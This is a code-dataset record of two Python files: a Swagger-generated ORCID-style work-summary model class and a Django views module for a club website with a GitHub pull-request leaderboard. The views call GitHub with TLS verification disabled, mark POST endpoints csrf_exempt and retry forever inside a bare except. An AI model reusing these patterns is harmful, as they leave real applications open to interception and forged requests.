'visibility': 'visibility',
'path': 'path',
'display_index': 'display-index'
}
def __init__(self, put_code=None, created_date=None, last_modified_date=None, source=None, title=None, external_ids=None, url=None, type=None, publication_date=None, journal_title=None, visibility=None, path=None, display_index=None): # noqa: E501
"""WorkSummaryV30Rc1 - a model defined in Swagger""" # noqa: E501
self._put_code = None
self._created_date = None
self._last_modified_date = None
self._source = None
self._title = None
self._external_ids = None
self._url = None
self._type = None
self._publication_date = None
self._journal_title = None
self._visibility = None
self._path = None
self._display_index = None
self.discriminator = None
if put_code is not None:
self.put_code = put_code
if created_date is not None:
self.created_date = created_date
if last_modified_date is not None:
self.last_modified_date = last_modified_date
if source is not None:
self.source = source
if title is not None:
self.title = title
if external_ids is not None:
self.external_ids = external_ids
if url is not None:
self.url = url
if type is not None:
self.type = type
if publication_date is not None:
self.publication_date = publication_date
if journal_title is not None:
self.journal_title = journal_title
if visibility is not None:
self.visibility = visibility
if path is not None:
self.path = path
if display_index is not None:
self.display_index = display_index
@property
def put_code(self):
"""Gets the put_code of this WorkSummaryV30Rc1. # noqa: E501
:return: The put_code of this WorkSummaryV30Rc1. # noqa: E501
:rtype: int
"""
return self._put_code
@put_code.setter
def put_code(self, put_code):
"""Sets the put_code of this WorkSummaryV30Rc1.
:param put_code: The put_code of this WorkSummaryV30Rc1. # noqa: E501
:type: int
"""
self._put_code = put_code
@property
def created_date(self):
"""Gets the created_date of this WorkSummaryV30Rc1. # noqa: E501
:return: The created_date of this WorkSummaryV30Rc1. # noqa: E501
:rtype: CreatedDateV30Rc1
"""
return self._created_date
@created_date.setter
def created_date(self, created_date):
"""Sets the created_date of this WorkSummaryV30Rc1.
:param created_date: The created_date of this WorkSummaryV30Rc1. # noqa: E501
:type: CreatedDateV30Rc1
"""
self._created_date = created_date
@property
def last_modified_date(self):
"""Gets the last_modified_date of this WorkSummaryV30Rc1. # noqa: E501
:return: The last_modified_date of this WorkSummaryV30Rc1. # noqa: E501
:rtype: LastModifiedDateV30Rc1
"""
return self._last_modified_date
@last_modified_date.setter
def last_modified_date(self, last_modified_date):
"""Sets the last_modified_date of this WorkSummaryV30Rc1.
:param last_modified_date: The last_modified_date of this WorkSummaryV30Rc1. # noqa: E501
:type: LastModifiedDateV30Rc1
"""
self._last_modified_date = last_modified_date
@property
def source(self):
"""Gets the source of this WorkSummaryV30Rc1. # noqa: E501
:return: The source of this WorkSummaryV30Rc1. # noqa: E501
:rtype: SourceV30Rc1
"""
return self._source
@source.setter
def source(self, source):
"""Sets the source of this WorkSummaryV30Rc1.
:param source: The source of this WorkSummaryV30Rc1. # noqa: E501
:type: SourceV30Rc1
"""
self._source = source
@property
def title(self):
"""Gets the title of this WorkSummaryV30Rc1. # noqa: E501
:return: The title of this WorkSummaryV30Rc1. # noqa: E501
:rtype: WorkTitleV30Rc1
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this WorkSummaryV30Rc1.
:param title: The title of this WorkSummaryV30Rc1. # noqa: E501
:type: WorkTitleV30Rc1
"""
self._title = title
@property
def external_ids(self):
"""Gets the external_ids of this WorkSummaryV30Rc1. # noqa: E501
:return: The external_ids of this WorkSummaryV30Rc1. # noqa: E501
:rtype: ExternalIDsV30Rc1
"""
return self._external_ids
@external_ids.setter
def external_ids(self, external_ids):
"""Sets the external_ids of this WorkSummaryV30Rc1.
:param external_ids: The external_ids of this WorkSummaryV30Rc1. # noqa: E501
:type: ExternalIDsV30Rc1
"""
self._external_ids = external_ids
@property
def url(self):
"""Gets the url of this WorkSummaryV30Rc1. # noqa: E501
:return: The url of this WorkSummaryV30Rc1. # noqa: E501
:rtype: UrlV30Rc1
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this WorkSummaryV30Rc1.
:param url: The url of this WorkSummaryV30Rc1. # noqa: E501
:type: UrlV30Rc1
"""
self._url = url
@property
def type(self):
"""Gets the type of this WorkSummaryV30Rc1. # noqa: E501
:return: The type of this WorkSummaryV30Rc1. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this WorkSummaryV30Rc1.
:param type: The type of this WorkSummaryV30Rc1. # noqa: E501
:type: str
"""
allowed_values = ["ARTISTIC_PERFORMANCE", "BOOK_CHAPTER", "BOOK_REVIEW", "BOOK", "CONFERENCE_ABSTRACT", "CONFERENCE_PAPER", "CONFERENCE_POSTER", "DATA_SET", "DICTIONARY_ENTRY", "DISCLOSURE", "DISSERTATION", "EDITED_BOOK", "ENCYCLOPEDIA_ENTRY", "INVENTION", "JOURNAL_ARTICLE", "JOURNAL_ISSUE", "LECTURE_SPEECH", "LICENSE", "MAGAZINE_ARTICLE", "MANUAL", "NEWSLETTER_ARTICLE", "NEWSPAPER_ARTICLE", "ONLINE_RESOURCE", "OTHER", "PATENT", "PREPRINT", "REGISTERED_COPYRIGHT", "REPORT", "RESEARCH_TECHNIQUE", "RESEARCH_TOOL", "SOFTWARE", "SPIN_OFF_COMPANY", "STANDARDS_AND_POLICY", "SUPERVISED_STUDENT_PUBLICATION", "TECHNICAL_STANDARD", "TEST", "TRADEMARK", "TRANSLATION", "WEBSITE", "WORKING_PAPER", "UNDEFINED"] # noqa: E501
if type not in allowed_values:
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
@property
def publication_date(self):
"""Gets the publication_date of this WorkSummaryV30Rc1. # noqa: E501
:return: The publication_date of this WorkSummaryV30Rc1. # noqa: E501
:rtype: PublicationDateV30Rc1
"""
return self._publication_date
@publication_date.setter
def publication_date(self, publication_date):
"""Sets the publication_date of this WorkSummaryV30Rc1.
:param publication_date: The publication_date of this WorkSummaryV30Rc1. # noqa: E501
:type: PublicationDateV30Rc1
"""
self._publication_date = publication_date
@property
def journal_title(self):
"""Gets the journal_title of this WorkSummaryV30Rc1. # noqa: E501
:return: The journal_title of this WorkSummaryV30Rc1. # noqa: E501
:rtype: TitleV30Rc1
"""
return self._journal_title
@journal_title.setter
def journal_title(self, journal_title):
"""Sets the journal_title of this WorkSummaryV30Rc1.
:param journal_title: The journal_title of this WorkSummaryV30Rc1. # noqa: E501
:type: TitleV30Rc1
"""
self._journal_title = journal_title
@property
def visibility(self):
"""Gets the visibility of this WorkSummaryV30Rc1. # noqa: E501
:return: The visibility of this WorkSummaryV30Rc1. # noqa: E501
:rtype: str
"""
return self._visibility
@visibility.setter
def visibility(self, visibility):
"""Sets the visibility of this WorkSummaryV30Rc1.
:param visibility: The visibility of this WorkSummaryV30Rc1. # noqa: E501
:type: str
"""
allowed_values = ["LIMITED", "REGISTERED_ONLY", "PUBLIC", "PRIVATE"] # noqa: E501
if visibility not in allowed_values:
raise ValueError(
"Invalid value for `visibility` ({0}), must be one of {1}" # noqa: E501
.format(visibility, allowed_values)
)
self._visibility = visibility
@property
def path(self):
"""Gets the path of this WorkSummaryV30Rc1. # noqa: E501
:return: The path of this WorkSummaryV30Rc1. # noqa: E501
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""Sets the path of this WorkSummaryV30Rc1.
:param path: The path of this WorkSummaryV30Rc1. # noqa: E501
:type: str
"""
self._path = path
@property
def display_index(self):
"""Gets the display_index of this WorkSummaryV30Rc1. # noqa: E501
:return: The display_index of this WorkSummaryV30Rc1. # noqa: E501
:rtype: str
"""
return self._display_index
@display_index.setter
def display_index(self, display_index):
"""Sets the display_index of this WorkSummaryV30Rc1.
:param display_index: The display_index of this WorkSummaryV30Rc1. # noqa: E501
:type: str
"""
self._display_index = display_index
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(WorkSummaryV30Rc1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WorkSummaryV30Rc1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| mit | 3,248,907,714,498,165,000 | 30.422122 | 728 | 0.599282 | false |
pclubuiet/website | home/views.py | 1 | 3396 | from django import views
from django.shortcuts import render, get_object_or_404
from django.views.generic import TemplateView
from django.views.generic.edit import CreateView
from .models import *
from .forms import *
import requests
import http
from django.urls import reverse_lazy
from django.views.decorators.csrf import csrf_exempt
from django.http import JsonResponse
class Template404(TemplateView):
template_name = "404.html"
class Home(TemplateView):
template_name = 'home/home.html'
class Topics(views.View):
def get(self, request, *args, **kwargs):
return render(request, "home/resources/topics.html", {'topics': Topic.objects.all()})
class Resources(views.View):
def get(self, request, pk, *args, **kwargs):
topic = get_object_or_404(Topic, pk=pk)
return render(request, "home/resources/resources.html", {'resources': topic.resource_set.all(), 'topic' : topic})
class BlogPostList(views.View):
def get(self, request, *args, **kwargs):
posts = BlogPost.objects.all()
return render(request, "home/blog/index.html", {'posts': posts})
class BlogPostView(views.View):
def get(self, request, pk, *args, **kwargs):
post = get_object_or_404(BlogPost, pk=pk)
return render(request, "home/blog/blog_post.html", {'post': post})
class Leaderboard(views.View):
def get(self, request, *args, **kwargs):
users = Users.objects.all()
for user in users:
connected = False
while not connected:
try:
user_name = user.github_handle
response = requests.get('https://api.github.com/search/issues?sort=created&q=author:{}&type:pr&per_page=100'.format(user_name), verify = False).json()
pr_count = 0
print(response)
for obj in response['items']:
if('pull_request' in obj):
if('2018-09-30T00:00:00Z'<obj['created_at']<'2018-10-31T23:59:59Z'):
pr_count += 1
user.pr_count = pr_count
user.save()
connected = True
except:
pass
return render(request, 'home/leaderboard.html', {'users': users})
class RegisterUser(CreateView):
form_class = RegisterUserForm
template_name = "home/registeruser.html"
success_url = reverse_lazy('home:home')
@csrf_exempt
def GithubEmailCheck(request):
github_handle = request.POST.get('github_handle')
email = request.POST.get('email')
print("Received ", github_handle)
users = Users.objects.all()
for user in users:
if user.github_handle == github_handle:
return JsonResponse({'message' : 'Duplicate Github Handle'})
if user.email == email:
return JsonResponse({'message' : 'Duplicate Email'})
return JsonResponse({'message' : 'New'})
@csrf_exempt
def GithubCheck(request):
github_handle = request.POST.get('github_handle')
response = requests.get("https://api.github.com/users/{}".format(github_handle), verify = False).json()
print("https://api.github.com/users/{}".format(github_handle))
if ('login' in response):
print("Found")
return JsonResponse({'message' : 'Found'})
else:
return JsonResponse({'message' : 'Not Found'}) | gpl-3.0 | -1,718,221,211,592,258,300 | 38.045977 | 170 | 0.620436 | false |